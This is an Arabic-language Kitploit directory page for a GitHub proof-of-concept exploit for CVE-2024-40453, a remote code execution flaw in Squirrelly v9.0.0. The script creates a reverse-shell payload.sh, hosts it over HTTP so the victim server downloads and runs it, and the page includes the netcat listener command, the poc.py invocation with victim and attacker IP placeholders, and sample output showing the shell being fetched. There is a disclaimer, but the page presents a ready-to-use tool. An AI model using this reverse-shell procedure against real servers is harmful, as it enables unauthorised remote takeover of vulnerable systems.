Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-40453 — CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc | Kitploit
أدوات/GitHubGitHub/bwithe/cve-2024-40453
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-40453 - Squirrelly v9.0.0 RCE

إخلاء مسؤولية:

هذا البرنامج النصي هو للاستخدام التعليمي فقط.

لا تستخدمه لأغراض غير قانونية.

إذا قمت بذلك، فهذه مسؤوليتك بالكامل؛ لست مسؤولاً عن أي إساءة استخدام.

الوصف

ينشئ هذا البرنامج النصي شيل عكسي يسمى payload.sh في الدليل الحالي.

ثم يستضيف خادم http على المنفذ 80 ليتمكن الضحية من سحب payload.sh منه.

يجب بدء مستمع على جهاز المهاجم.

يتم إيقاف تشغيل خادم http بعد 3 ثوانٍ للسماح للضحية بسحب وتنفيذ payload.sh

شرح الاستغلال

بناءً على المعلومات التالية، تم تطوير هذا الدليل الإثباتي. https://samuzora.com/posts/cve-2024-40453

الاستخدام

ابدأ المستمع الخاص بك

root@kitploit:~
rlwrap nc -nvlp 3000

نفذ الحمولة

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

تنزيل الأداة